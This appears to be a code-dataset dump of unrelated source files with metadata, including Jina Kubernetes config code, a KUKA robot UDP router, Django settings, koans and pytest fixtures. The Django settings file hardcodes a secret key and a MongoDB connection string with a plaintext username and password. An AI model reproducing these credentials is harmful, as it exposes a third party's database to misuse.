if cargs.uses != __default_executor__:
cargs.uses = 'config.yml'
return construct_runtime_container_args(
cargs, uses_metas, uses_with, pod_type
)
def get_runtime_yamls(
self,
) -> List[Dict]:
cargs = copy.copy(self.deployment_args)
image_name = self._get_image_name(cargs.uses)
image_name_uses_before = (
self._get_image_name(cargs.uses_before)
if hasattr(cargs, 'uses_before') and cargs.uses_before
else None
)
image_name_uses_after = (
self._get_image_name(cargs.uses_after)
if hasattr(cargs, 'uses_after') and cargs.uses_after
else None
)
container_args = self._get_container_args(cargs, pod_type=self.pod_type)
container_args_uses_before = None
if getattr(cargs, 'uses_before', False):
uses_before_cargs = copy.copy(cargs)
uses_before_cargs.uses = cargs.uses_before
uses_before_cargs.name = f'{self.common_args.name}/uses-before'
uses_before_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE
uses_before_cargs.uses_before_address = None
uses_before_cargs.uses_after_address = None
uses_before_cargs.uses_before = None
uses_before_cargs.uses_after = None
uses_before_cargs.uses_with = None
uses_before_cargs.uses_metas = None
uses_before_cargs.env = None
uses_before_cargs.connection_list = None
uses_before_cargs.runtime_cls = 'WorkerRuntime'
uses_before_cargs.pod_role = PodRoleType.WORKER
uses_before_cargs.polling = None
container_args_uses_before = self._get_container_args(
uses_before_cargs, PodRoleType.WORKER
)
container_args_uses_after = None
if getattr(cargs, 'uses_after', False):
uses_after_cargs = copy.copy(cargs)
uses_after_cargs.uses = cargs.uses_after
uses_after_cargs.name = f'{self.common_args.name}/uses-after'
uses_after_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_AFTER
uses_after_cargs.uses_before_address = None
uses_after_cargs.uses_after_address = None
uses_after_cargs.uses_before = None
uses_after_cargs.uses_after = None
uses_after_cargs.uses_with = None
uses_after_cargs.uses_metas = None
uses_after_cargs.env = None
uses_after_cargs.connection_list = None
uses_after_cargs.runtime_cls = 'WorkerRuntime'
uses_after_cargs.pod_role = PodRoleType.WORKER
uses_after_cargs.polling = None
container_args_uses_after = self._get_container_args(
uses_after_cargs, PodRoleType.WORKER
)
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
image_name_uses_after=image_name_uses_after,
image_name_uses_before=image_name_uses_before,
container_cmd='["jina"]',
container_cmd_uses_before='["jina"]',
container_cmd_uses_after='["jina"]',
container_args=f'{container_args}',
container_args_uses_before=container_args_uses_before,
container_args_uses_after=container_args_uses_after,
replicas=self.num_replicas,
pull_policy='IfNotPresent',
jina_deployment_name=self.jina_deployment_name,
pod_type=self.pod_type,
shard_id=self.shard_id,
env=cargs.env,
gpus=cargs.gpus if hasattr(cargs, 'gpus') else None,
)
def __init__(
self,
args: Union['Namespace', Dict],
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
# External Deployments should be ignored in a K8s based Flow
assert not (hasattr(args, 'external') and args.external)
if not validate_uses(args.uses):
raise NoContainerizedError(
f'Executor "{args.uses}" is not valid to be used in K8s. '
'You need to use a containerized Executor. You may check `jina hub --help` to see how Jina Hub can help you building containerized Executors.'
)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
self.head_deployment = None
self.args = copy.copy(args)
if k8s_namespace is not None:
# otherwise it will remain with the one from the original Deployment
self.args.k8s_namespace = k8s_namespace
self.args.k8s_connection_pool = k8s_connection_pool
self.name = self.args.name
self.deployment_args = self._get_deployment_args(self.args)
if self.deployment_args['head_deployment'] is not None:
self.head_deployment = self._K8sDeployment(
name=self.deployment_args['head_deployment'].name,
version=get_base_executor_version(),
shard_id=None,
jina_deployment_name=self.name,
common_args=self.args,
deployment_args=self.deployment_args['head_deployment'],
pod_type=PodRoleType.HEAD,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses,
)
self.worker_deployments = []
deployment_args = self.deployment_args['deployments']
for i, args in enumerate(deployment_args):
name = f'{self.name}-{i}' if len(deployment_args) > 1 else f'{self.name}'
self.worker_deployments.append(
self._K8sDeployment(
name=name,
version=get_base_executor_version(),
shard_id=i,
common_args=self.args,
deployment_args=args,
pod_type=PodRoleType.WORKER
if name != 'gateway'
else PodRoleType.GATEWAY,
jina_deployment_name=self.name,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses
if name == 'gateway'
else None,
)
)
def _get_deployment_args(self, args):
parsed_args = {
'head_deployment': None,
'deployments': [],
}
shards = getattr(args, 'shards', 1)
uses_before = getattr(args, 'uses_before', None)
uses_after = getattr(args, 'uses_after', None)
if args.name != 'gateway':
parsed_args['head_deployment'] = BaseDeployment._copy_to_head_args(
self.args
)
parsed_args['head_deployment'].gpus = None
parsed_args['head_deployment'].port = K8sGrpcConnectionPool.K8S_PORT
parsed_args['head_deployment'].uses = None
parsed_args['head_deployment'].uses_metas = None
parsed_args['head_deployment'].uses_with = None
parsed_args['head_deployment'].env = None
# if the k8s connection pool is disabled, the connection pool is managed manually
if not self.k8s_connection_pool:
import json
connection_list = {}
for i in range(shards):
name = (
f'{to_compatible_name(self.name)}-{i}'
if shards > 1
else f'{to_compatible_name(self.name)}'
)
connection_list[
str(i)
] = f'{name}.{self.k8s_namespace}.svc:{K8sGrpcConnectionPool.K8S_PORT}'
parsed_args['head_deployment'].connection_list = json.dumps(
connection_list
)
if uses_before:
parsed_args[
'head_deployment'
].uses_before_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE}'
)
if uses_after:
parsed_args[
'head_deployment'
].uses_after_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_AFTER}'
)
for i in range(shards):
cargs = copy.deepcopy(args)
cargs.shard_id = i
cargs.uses_before = None
cargs.uses_after = None
if args.name != 'gateway':
cargs.port = K8sGrpcConnectionPool.K8S_PORT
cargs.uses_before_address = None
cargs.uses_after_address = None
if shards > 1:
cargs.name = f'{cargs.name}-{i}'
if args.name == 'gateway':
cargs.pod_role = PodRoleType.GATEWAY
# the worker runtimes do not care
else:
cargs.k8s_connection_pool = False
parsed_args['deployments'].append(cargs)
return parsed_args
def to_k8s_yaml(
self,
) -> List[Tuple[str, List[Dict]]]:
"""
Return a list of dictionary configurations. One for each deployment in this Deployment
.. # noqa: DAR201
.. # noqa: DAR101
"""
if self.name == 'gateway':
return [
(
'gateway',
self.worker_deployments[0].get_gateway_yamls(),
)
]
else:
deployments = [self.head_deployment]
deployments.extend(self.worker_deployments)
return [
(
deployment.dns_name,
deployment.get_runtime_yamls(),
)
for deployment in deployments
]
| jina/orchestrate/deployments/config/k8s.py | 14,858 | Class that implements the output of configuration files for Kubernetes for a given Deployment.
Return a list of dictionary configurations. One for each deployment in this Deployment
.. # noqa: DAR201
.. # noqa: DAR101
External Deployments should be ignored in a K8s based Flow otherwise it will remain with the one from the original Deployment if the k8s connection pool is disabled, the connection pool is managed manually the worker runtimes do not care | 465 | en | 0.859786 |
#!/usr/bin/env python
# Copyright (c) 2014, Norwegian University of Science and Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author: Lars Tingelstad
# Maintainer: Lars Tingelstad <lars.tingelstad@ntnu.no>
import socket
import threading
import time
import numpy as np
import struct
import xml.etree.ElementTree as et
class UDPServerRealTime(threading.Thread):
def __init__(self,name, host, port, handshake=None):
threading.Thread.__init__(self)
self.daemon = True
self.name = name
self._host = host
self._port = port
self._handshake = handshake
self._timeout = None
self._timeout_count = 0
self._is_timed_out = False
self._max_timeout_count = None
self._lock = threading.Lock()
self._recv_data = None
self._send_data = None
self._remote_addr = None
self.is_connected = False
self._stop_flag = threading.Event()
self._disconnect_client_flag = threading.Event()
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.settimeout(self._timeout)
self._socket.bind((self._host, self._port))
def set_max_timeout_count(self, timeout_count):
self._max_timeout_count = timeout_count
def timeout(self):
return self._timeout
def set_timeout(self, timeout):
self._timeout = timeout
self._socket.settimeout(self._timeout)
def receive(self):
try:
#self._lock.acquire()
data, addr = self._socket.recvfrom(1024)
self._recv_data = data
#self._lock.release()
## Set connection if handshake mechanism is not used
if self._handshake is None and not self.is_connected:
self._remote_addr = addr
print("{name}: Got connection from: {addr}".format(name=self.name, addr=self._remote_addr))
self.is_connected = True
self._timeout_count = 0
return data
except socket.timeout, e:
if self._max_timeout_count is not None:
self._timeout_count += 1
print("{name}: Late package!".format(name=self.name))
if self._timeout_count > self._max_timeout_count:
print("{name}: Maximum timeouts. Disconnecting client: {addr}".format(name=self.name, addr=self._remote_addr))
self._disconnect_client_flag.set()
return None
def send(self, data):
#self._lock.acquire()
self._send_data = data
self._socket.sendto(self._send_data, self._remote_addr)
#self._lock.release()
def connect(self):
''' Create connection from external client '''
if self._handshake is not None:
if not self.is_connected:
self._socket.settimeout(None)
data, remote_addr = self._socket.recvfrom(1024)
if data == self._handshake:
self._remote_addr = remote_addr
print("{name}: Got connection from: {addr}".format(name=self.name, addr=self._remote_addr))
self.is_connected = True
else:
print("{name}: Could not accept connection from: {addr}".format(name=self.name, addr=remote_addr))
self._disconnect_client_flag.set()
else:
print("{name}: Can not create connection without handshake!".format(name=self.name))
if self._timeout is not None:
self._socket.settimeout(self._timeout)
def stop(self):
print("{name}: Stopping!".format(name=self.name))
self._stop_flag.set()
def disconnect(self):
#print("{name}: Disconnecting!".format(name=self.name))
self._disconnect_client_flag.set()
def run(self):
while not self._stop_flag.is_set():
print("{name}: Waiting for connection!".format(name=self.name))
if self._handshake is not None:
self.connect()
self._disconnect_client_flag.wait()
print("{name}: Disconnecting client".format(name=self.name))
self.is_connected = False
self._remote_addr = None
self._disconnect_client_flag.clear()
self.join()
class KUKARSIRouter(object):
def __init__(self):
self._lock = threading.Lock()
self._joint_correction = np.zeros(6).astype(np.float32)
self._joint_setpoint_position_init = None
#self._rsi_server = UDPServerRealTime('rsi server','localhost', 49152)
self._rsi_server = UDPServerRealTime('rsi server','192.168.1.67', 49152)
self._rsi_server.set_max_timeout_count(3)
self._ext_control_server = UDPServerRealTime('ext control server', 'localhost', 10000, "RSI")
self._ext_control_server.set_timeout(0.004)
self._ext_control_server.set_max_timeout_count(3)
def _parse_xml_from_robot(self, data):
root = et.fromstring(data)
# Cartesian actual position
RIst = root.find('RIst').attrib
cart_actual_pos = np.array([RIst['X'], RIst['Y'], RIst['Z'],
RIst['A'], RIst['B'], RIst['C']], dtype=np.float64)
# Cartesian setpoint position
RSol = root.find('RSol').attrib
cart_setpoint_pos = np.array([RSol['X'], RSol['Y'], RSol['Z'],
RSol['A'], RSol['B'], RSol['C']], dtype=np.float64)
# Axis actual
AIPos = root.find('AIPos').attrib
axis_actual_pos = np.array([AIPos['A1'], AIPos['A2'],AIPos['A3'],
AIPos['A4'], AIPos['A5'],AIPos['A6']], dtype=np.float64)
# Axis setpoint pos
ASPos = root.find('ASPos').attrib
axis_setpoint_pos = np.array([ASPos['A1'], ASPos['A2'],ASPos['A3'],
ASPos['A4'], ASPos['A5'],ASPos['A6']], dtype=np.float64)
# Number of late packages
Delay = root.find('Delay').attrib
n_late_packages = int(Delay['D'])
# IPOC number
IPOC = int(root.find('IPOC').text)
return axis_actual_pos, axis_setpoint_pos, n_late_packages, IPOC
def _create_xml_to_robot(self, desired_axis_corr, ipoc_cycle_num):
dac = desired_axis_corr
sen = et.Element('Sen', {'Type':'ImFree'})
akorr = et.SubElement(sen, 'AK', {'A1':str(dac[0]),
'A2':str(dac[1]),
'A3':str(dac[2]),
'A4':str(dac[3]),
'A5':str(dac[4]),
'A6':str(dac[5])})
ipoc = et.SubElement(sen, 'IPOC').text = str(ipoc_cycle_num)
return et.tostring(sen)
def _create_joint_pos_packet(self, ipoc, axis_actual_pos):
return struct.pack('Q6d', ipoc, *axis_actual_pos)
def _parse_joint_pos_packet(self, packet):
data = struct.unpack('Q6d', packet)
ipoc = data[0]
q_desired = np.array(data[1:], dtype=np.float64)
return ipoc, q_desired
def run(self):
self._ext_control_server.start()
self._rsi_server.start()
#while not self._stop_flag.is_set():
while True:
## Receive rsi packet from robot. This is a blocking call if no rsi
## is connected. The timeout is set to 4ms when the robot connects,
## and is reset to None when the robot disconnects.
data = self._rsi_server.receive()
if self._rsi_server.is_connected:
## Set timeout of receive for RSI client when robot connects
if self._rsi_server.timeout() is None:
self._rsi_server.set_timeout(0.004)
## Only parse rsi packet if content is not None
if data is not None:
## Parse rsi packet xml document
q_actual, q_setpoint, late_packages, ipoc = self._parse_xml_from_robot(data)
if self._joint_setpoint_position_init is None:
self._joint_setpoint_position_init = q_setpoint
if self._ext_control_server.is_connected:
ipoc_out = ipoc
## Create joint position packet to send to external control client
packet = self._create_joint_pos_packet(ipoc_out, q_actual)
## Send send joint position packet to external control client
self._ext_control_server.send(packet)
## Receive desired joint position packet
data = self._ext_control_server.receive()
if data is not None:
## parse data from client
ipoc_in, q_desired = self._parse_joint_pos_packet(data)
print(q_desired)
## check if the received ipoc timestamp is equal to
## the received ipoc timestamp from the external
## control client
if ipoc_in == ipoc_out:
## The joint correction is equal to the desired joint
# position minus the current joint setpoint.
with self._lock:
#self._joint_correction = q_desired - self._joint_setpoint_position_init
self._joint_correction = q_desired - q_setpoint
with self._lock:
data = self._create_xml_to_robot(self._joint_correction, ipoc)
print(data)
self._rsi_server.send(data)
else:
print("RSI Router: No connection with robot. Disconnecting all external connections!")
self._joint_setpoint_position_init = None
self._joint_correction = np.zeros(6).astype(np.float32)
self._ext_control_server.disconnect()
self._rsi_server.set_timeout(None)
self._ext_control_server.stop()
self._rsi_server.stop;
if __name__ == '__main__':
router = KUKARSIRouter()
router.run()
| kuka_driver/src/kuka_driver/kuka_rsi_router.py | 11,935 | !/usr/bin/env python Copyright (c) 2014, Norwegian University of Science and Technology All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Author: Lars Tingelstad Maintainer: Lars Tingelstad <lars.tingelstad@ntnu.no>self._lock.acquire()self._lock.release() Set connection if handshake mechanism is not usedself._lock.acquire()self._lock.release()print("{name}: Disconnecting!".format(name=self.name))self._rsi_server = UDPServerRealTime('rsi server','localhost', 49152) Cartesian actual position Cartesian setpoint position Axis actual Axis setpoint pos Number of late packages IPOC numberwhile not self._stop_flag.is_set(): Receive rsi packet from robot. This is a blocking call if no rsi is connected. The timeout is set to 4ms when the robot connects, and is reset to None when the robot disconnects. Set timeout of receive for RSI client when robot connects Only parse rsi packet if content is not None Parse rsi packet xml document Create joint position packet to send to external control client Send send joint position packet to external control client Receive desired joint position packet parse data from client check if the received ipoc timestamp is equal to the received ipoc timestamp from the external control client The joint correction is equal to the desired joint position minus the current joint setpoint.self._joint_correction = q_desired - self._joint_setpoint_position_init | 2,804 | en | 0.833432 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Northwestern University.
#
# Invenio-Vocabularies is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Subjects services."""
class SubjectsLabels:
"""Fetching of subjects labels for facets."""
def __call__(self, ids):
"""Return the mapping when evaluated.
In this case, the ids received are actually the vocabulary `scheme`
(top-level) and `subject` (nested). And since they are already
human-readable, we keep them as-is.
"""
unique_ids = list(set(ids))
return {id_: id_ for id_ in unique_ids}
| invenio_vocabularies/contrib/subjects/facets.py | 695 | Fetching of subjects labels for facets.
Return the mapping when evaluated.
In this case, the ids received are actually the vocabulary `scheme`
(top-level) and `subject` (nested). And since they are already
human-readable, we keep them as-is.
Subjects services.
-*- coding: utf-8 -*- Copyright (C) 2021 Northwestern University. Invenio-Vocabularies is free software; you can redistribute it and/or modify it under the terms of the MIT License; see LICENSE file for more details. | 480 | en | 0.899633 |
"""
Django settings for CoffeeAPI project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import urllib
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2z$9iq)q+$an2fm4gj271_*z-r#x86pcc976)^eh@8kuc*#@7h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'CoffeeAPI.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CoffeeAPI.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
"""
DATABASES = {
'default': {
'ENGINE': 'djongo',
"NAME": 'mongodb+srv://mohammed-mongo:iF7MzKLgXvgL57ve@coffee-api.u2crw.mongodb.net/test?retryWrites=true&w=majority'
}
}
"""
DATABASES = {
"default": {
"ENGINE": "djongo",
"CLIENT": {
"host": "mongodb+srv://mohammed-mongo:iF7MzKLgXvgL57ve@coffee-api.u2crw.mongodb.net/?retryWrites=true&w=majority",
"username": "mohammed-mongo",
"password": "iF7MzKLgXvgL57ve",
"name": "test",
"authMechanism": "SCRAM-SHA-1",
},
}}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| CoffeeAPI/CoffeeAPI/settings.py | 3,586 | Django settings for CoffeeAPI project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
Build paths inside the project like this: os.path.join(BASE_DIR, ...) Quick-start development settings - unsuitable for production See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/ SECURITY WARNING: keep the secret key used in production secret! SECURITY WARNING: don't run with debug turned on in production! Application definition Database https://docs.djangoproject.com/en/3.0/ref/settings/databases Password validation https://docs.djangoproject.com/en/3.0/ref/settings/auth-password-validators Internationalization https://docs.djangoproject.com/en/3.0/topics/i18n/ Static files (CSS, JavaScript, Images) https://docs.djangoproject.com/en/3.0/howto/static-files/ | 990 | en | 0.677913 |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/loot/quest/shared_nym_droid_memory_chip.iff"
result.attribute_template_id = -1
result.stfName("item_n","nym_memory_chip")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | data/scripts/templates/object/tangible/loot/quest/shared_nym_droid_memory_chip.py | 458 | NOTICE: THIS FILE IS AUTOGENERATED MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES BEGIN MODIFICATIONS END MODIFICATIONS | 168 | en | 0.698026 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import random
class DiceSet:
def __init__(self):
self._values = None
@property
def values(self):
return self._values
def roll(self, n):
# Needs implementing!
# Tip: random.randint(min, max) can be used to generate random numbers
self._values = [random.randint(1, 6) for n in range(n)]
class AboutDiceProject(Koan):
def test_can_create_a_dice_set(self):
dice = DiceSet()
self.assertTrue(dice)
def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6(self):
dice = DiceSet()
dice.roll(5)
self.assertTrue(isinstance(dice.values, list), "should be a list")
self.assertEqual(5, len(dice.values))
for value in dice.values:
self.assertTrue(value >= 1 and value <= 6, "value " +
str(value) + " must be between 1 and 6")
def test_dice_values_do_not_change_unless_explicitly_rolled(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
second_time = dice.values
self.assertEqual(first_time, second_time)
def test_dice_values_should_change_between_rolls(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
dice.roll(5)
second_time = dice.values
self.assertNotEqual(first_time, second_time,
"Two rolls should not be equal")
# THINK ABOUT IT:
#
# If the rolls are random, then it is possible (although not
# likely) that two consecutive rolls are equal. What would be a
# better way to test this?
# Roll two different instances of DiceSet and check that they both
# have any value
def test_you_can_roll_different_numbers_of_dice(self):
dice = DiceSet()
dice.roll(3)
self.assertEqual(3, len(dice.values))
dice.roll(1)
self.assertEqual(1, len(dice.values))
| python3/koans/about_dice_project.py | 2,047 | !/usr/bin/env python -*- coding: utf-8 -*- Needs implementing! Tip: random.randint(min, max) can be used to generate random numbers THINK ABOUT IT: If the rolls are random, then it is possible (although not likely) that two consecutive rolls are equal. What would be a better way to test this? Roll two different instances of DiceSet and check that they both have any value | 374 | en | 0.910246 |
#This file was originally generated by PyScripter's unitest wizard
import unittest
from coord import Coord
from cell import Cell
from field import Field
def dummy():
""" Dummy function for comparison of the return values """
return
class CoordTest(unittest.TestCase):
def setUp(self):
self.field = Field()
pass
def tearDown(self):
pass
def testMain(self):
self.coord = Coord()
assert self.coord.main() == dummy(), 'Gol01.get_size() does not provide the right return value'
def testCoordSavesItsCoordinates(self):
coord = Coord(4,5)
assert 4 == coord.x
assert 5 == coord.y
def testCreatedCellIsAlive(self):
coord1 = Coord(4,5)
cell = Cell(coord1)
assert cell.isAlive() == True, 'cell.status() does not provide the right return value'
def testCellKnowsIfItLivesInTheNextStep(self):
cell = Cell(Coord(4,5))
cell.nextStep(5)
assert False == cell.isAlive()
def addCell(self,x,y):
self.field.add(Cell(Coord(x, y)))
def fillExampleField(self):
self.addCell(1,1)
self.addCell(1,2)
self.addCell(2,1)
def testFieldIsWellCreated(self):
self.fillExampleField()
assert self.field.getNumberOfLivingCells() == 3, 'field.numberOfAliveCells does not provide the right return value'
# run all tests
if __name__ == "__main__":
try:
unittest.main()
except SystemExit as inst:
if inst.args[0] is True: # raised by sys.exit(True) when tests failed
raise
| src/game_of_life/python_coderetreat_socramob/cr_socramob08/coord_test.py | 1,645 | Dummy function for comparison of the return values
This file was originally generated by PyScripter's unitest wizard run all tests raised by sys.exit(True) when tests failed | 175 | en | 0.89528 |
# Copyright 2018 HTCondor Team, Computer Sciences Department,
# University of Wisconsin-Madison, WI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from pathlib import Path
from copy import copy
import pytest
import htmap
from htmap.settings import BASE_SETTINGS
from htmap._startup import ensure_htmap_dir_exists
# start with base settings (ignore user settings for tests)
htmap.settings.replace(BASE_SETTINGS)
htmap.settings[
"DELIVERY_METHOD"
] = "shared" # shared is the default for all tests that aren't parametric
htmap.settings["WAIT_TIME"] = 0.1
htmap.settings["MAP_OPTIONS.request_memory"] = "10MB"
htmap.settings["MAP_OPTIONS.keep_claim_idle"] = "1"
SETTINGS = copy(htmap.settings)
@pytest.fixture(scope="function", autouse=True)
def reset_settings():
htmap.settings.replace(SETTINGS)
@pytest.fixture(scope="function", autouse=True)
def set_transplant_dir(tmpdir_factory, reset_settings):
path = Path(tmpdir_factory.mktemp("htmap_transplant_dir"))
htmap.settings["TRANSPLANT.DIR"] = path
@pytest.fixture(scope="function")
def delivery_methods(delivery_method, reset_settings):
htmap.settings["DELIVERY_METHOD"] = delivery_method
def pytest_addoption(parser):
parser.addoption(
"--delivery",
nargs="+",
default=["shared"], # shared is the default for parametric delivery testing
)
def pytest_generate_tests(metafunc):
if "delivery_methods" in metafunc.fixturenames:
metafunc.parametrize(
"delivery_method", metafunc.config.getoption("delivery"),
)
@pytest.fixture(scope="function", autouse=True)
def set_htmap_dir_and_clean(tmpdir_factory):
map_dir = Path(tmpdir_factory.mktemp("htmap_dir"))
htmap.settings["HTMAP_DIR"] = map_dir
ensure_htmap_dir_exists()
yield
htmap.clean(all=True)
@pytest.fixture(scope="session")
def doubler():
def doubler(x):
return 2 * x
return doubler
@pytest.fixture(scope="session")
def mapped_doubler(doubler):
mapper = htmap.mapped(doubler)
return mapper
@pytest.fixture(scope="session")
def power():
def power(x=0, p=2):
return x ** p
return power
@pytest.fixture(scope="session")
def mapped_power(power):
mapper = htmap.mapped(power)
return mapper
@pytest.fixture(scope="session")
def never_returns():
def never(_):
while True:
time.sleep(1)
return never
@pytest.fixture(scope="function")
def map_that_never_finishes(never_returns):
m = htmap.map(never_returns, [None])
yield m
m.remove()
@pytest.fixture(scope="session")
def mapped_exception():
@htmap.mapped
def fail(x):
raise Exception(str(x))
return fail
def exception_msg(exc_info) -> str:
return str(exc_info.value)
